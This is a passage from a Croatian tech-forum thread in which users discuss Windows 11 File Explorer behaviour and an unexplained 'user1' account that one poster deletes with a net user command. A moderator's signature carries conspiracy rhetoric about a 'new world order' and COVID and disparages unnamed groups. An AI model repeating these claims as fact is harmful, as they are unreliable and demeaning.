Lenovo ThinkPad T14 Gen 2 + Lenovo ThinkPad Universal Thunderbolt 4 Dock

CPU: Intel Core i7-1165G7 @ 2.8 GHz
RAM: 2 x 16 GB DDR4-3200
SSD: Samsung 970 EVO Plus 2 TB NVMe M.2
LCD: 14" FHD IPS 400nits Low Power
WLAN: Intel Wi-Fi 6 AX201
WWAN: Quectel EM120R-GL 4G LTE CAT12
OS: Windows 11 Pro

LCD monitor: AOC AG493UCX
Keyboard: Razer Huntsman V2 Analog
Mice: Logitech G502 Proteus Spectrum
SB: Mackie Onyx Producer 2x2
Speakers: 2 x JBL LSR305
MFP: Canon Pixma MP240
NAS: Synology DS420+ with 4 x WD Red Pro 8 TB
HDD Dock: LC Power LC-DOCK-U3-CR + 12 x Hitachi/Samsung/Seagate/WD 1/2 TB

domy_os je offline   Reply With Quote
Staro 06.08.2023., 00:34   #1298
geronimo_2
Premium
Moj komp
 
geronimo_2's Avatar
 
Datum registracije: Jun 2005
Lokacija: Rijeka / Grobnik
Postovi: 3,909
Decki eset poceo blokat link na ovu temu. Javlja neki trojan. Pretpostavljam da je do svih ovih kodova gore pa se blesira
geronimo_2 je offline   Reply With Quote
Staro 10.01.2024., 10:38   #1299
spiderhr
Premium
 
Datum registracije: Jul 2021
Lokacija: Sesvete
Postovi: 529
Jooj kako me živcira kaj ne mogu otvoriti drugi File explorer kada ga jednom otvorim nego moram ctrl+n. Ima kakav hack da se to zaobiđe? Baš su sranje napravili.
__________________
Mali Čile SAD Češka Peru
spiderhr je offline   Reply With Quote
Staro 10.01.2024., 11:08   #1300
kopija
DIY DILETANT
 
kopija's Avatar
 
Datum registracije: Jan 2009
Lokacija: Čistilište
Postovi: 3,032
Citiraj:
Autor spiderhr Pregled postova
Jooj kako me živcira kaj ne mogu otvoriti drugi File explorer kada ga jednom otvorim nego moram ctrl+n. Ima kakav hack da se to zaobiđe? Baš su sranje napravili.

A kako bi ga ti htio otvoriti?

Snagom misli?
kopija je offline   Reply With Quote
Staro 10.01.2024., 11:09   #1301
spiderhr
Premium
 
Datum registracije: Jul 2021
Lokacija: Sesvete
Postovi: 529
Citiraj:
Autor kopija Pregled postova
A kako bi ga ti htio otvoriti?

Snagom misli?
Kak je bilo prije. Ikona u taskbaru otvorio se pa si na istu ikonu mogao otvoriti drugi, treći...

Inače mogućnost grupiranja prvo maknem jer mi se ne sviđa taj način.
__________________
Mali Čile SAD Češka Peru
spiderhr je offline   Reply With Quote
Staro 10.01.2024., 11:13   #1302
udarnik60
Premium
 
Datum registracije: Mar 2015
Lokacija: mars
Postovi: 288
Citiraj:
Autor spiderhr Pregled postova
Kak je bilo prije. Ikona u taskbaru otvorio se pa si na istu ikonu mogao otvoriti drugi, treći...



Inače mogućnost grupiranja prvo maknem jer mi se ne sviđa taj način.
Tipka za win + e ti ne otvara novi? Ili mišem middle click na ikonu u taskbaru?

Sent from my motorola edge 40 using Tapatalk
udarnik60 je offline   Reply With Quote
Staro 10.01.2024., 11:40   #1303
spiderhr
Premium
 
Datum registracije: Jul 2021
Lokacija: Sesvete
Postovi: 529
Meh... previše klikova plus kaj moram micati ruku s miša. Ovo sa win + e otvara.

Ma samo sam htio da ako već imam shortcutove u tasbaru da ih mogu višestruko otvoriti mišem. Jbg, razmazio me Linux a i do W7 je bilo sve normalno dok nisu počeli bijesne gliste izvoditi sa sučeljem kao to je bolje.

Edit: malo gunđam na Win. Bolje na Win nego na kolegice i kolege.
__________________
Mali Čile SAD Češka Peru

Zadnje izmijenjeno od: spiderhr. 10.01.2024. u 11:49.
spiderhr je offline   Reply With Quote
Staro 11.01.2024., 21:09   #1304
mkey
Premium
Moj komp
 
Datum registracije: Sep 2018
Lokacija: tu
Postovi: 1,888
Middle click na ikonu na taskbaru bi morao otvoriti još jedan prozor, koja god aplikacija da je u pitanju (samo da dopušta više instanci).
mkey je offline   Reply With Quote
Staro 11.02.2024., 15:19   #1305
Neo-ST
Buying Bitcoin
Moj komp
 
Neo-ST's Avatar
 
Datum registracije: Feb 2007
Lokacija: Croatia
Postovi: 7,969
Ekipa, iz čista mira mi se pojavio "user1" na Windowsima.
Znači sinoć sve bilo normalno, ugasim komp, odem leć, danas ga upalim i dočeka me onaj login izbornik da odaberem s kojim userom ću se logirati u Win, moj defaultni ili taj user1.
Ako kliknem na user1, pita me password. Wtf.

Uđem u svoj i u settingsima pod users vidim ovo:



Da li je moguće da je neki win update napravio tog usera?

EDIT:
Morao ući u safe mode, cmd run as admin, "net user user1 /del" da bi izbrisao taj account.
Nakon toga normalni boot u win, pa opet run netplwiz, i maknit kvačicu sa "users must enter username and password to log in to this computer", jer me bez toga svejedno zaustavljao na login screenu nakon boota.

Bravo Microsoft, bravo.

Zadnje izmijenjeno od: Neo-ST. 11.02.2024. u 15:30.
Neo-ST je offline   Reply With Quote
Staro 12.02.2024., 19:39   #1306
mkey
Premium
Moj komp
 
Datum registracije: Sep 2018
Lokacija: tu
Postovi: 1,888
Malo je sumnjivo da su windowsi napravili taj account.
mkey je offline   Reply With Quote
Staro 12.02.2024., 21:05   #1307
domy_os
EMP moderator
 
domy_os's Avatar
 
Datum registracije: Apr 2005
Lokacija: Osijek
Postovi: 18,381
__________________
"Kako su krojači novog svjetskog poretka uspjeli u tako kratko vrijeme slomiti intelektualne sposobnosti društva, uništiti kritičku svijest i ljudima nametnuti izvrnutu logiku?"

Nisu slomili u kratko vrijeme. Slamali su godinama, desetljećima pa i stoljećima. Svaka odgledana epizoda Big Brothera, svaki dečko koji ne zna niti promijeniti žarulju, a kamoli uzeti sjekiru i pocijepati drva, svaka cura koja misli da je briga za vlastitu obitelj robija, ali rad za par tisuća kuna u korporaciji 12 sati dnevno blagodat, svako promicanje terora političke korektnosti, svaka podrška promociji svih oblika poremećenosti… Sve to nas je dovelo do ovdje. Korona je samo zakucavanje lopte u gol nakon što je obrana već izigrana i golman odletio u prazno.




Lenovo ThinkPad T14 Gen 2 + Lenovo ThinkPad Universal Thunderbolt 4 Dock

CPU: Intel Core i7-1165G7 @ 2.8 GHz
RAM: 2 x 16 GB DDR4-3200
SSD: Samsung 970 EVO Plus 2 TB NVMe M.2
LCD: 14" FHD IPS 400nits Low Power
WLAN: Intel Wi-Fi 6 AX201
WWAN: Quectel EM120R-GL 4G LTE CAT12
OS: Windows 11 Pro

LCD monitor: AOC AG493UCX
Keyboard: Razer Huntsman V2 Analog
Mice: Logitech G502 Proteus Spectrum
SB: Mackie Onyx Producer 2x2
Speakers: 2 x JBL LSR305
MFP: Canon Pixma MP240
NAS: Synology DS420+ with 4 x WD Red Pro 8 TB
HDD Dock: LC Power LC-DOCK-U3-CR + 12 x Hitachi/Samsung/Seagate/WD 1/2 TB

domy_os je offline   Reply With Quote
Odgovori


Uređivanje

Pravila postanja
Vi ne možete otvarati nove teme
Vi ne možete pisati odgovore
Vi ne možete uploadati priloge
Vi ne možete uređivati svoje poruke

BB code je Uključeno
Smajlići su Uključeno
[IMG] kod je Uključeno
HTML je Isključeno

Idi na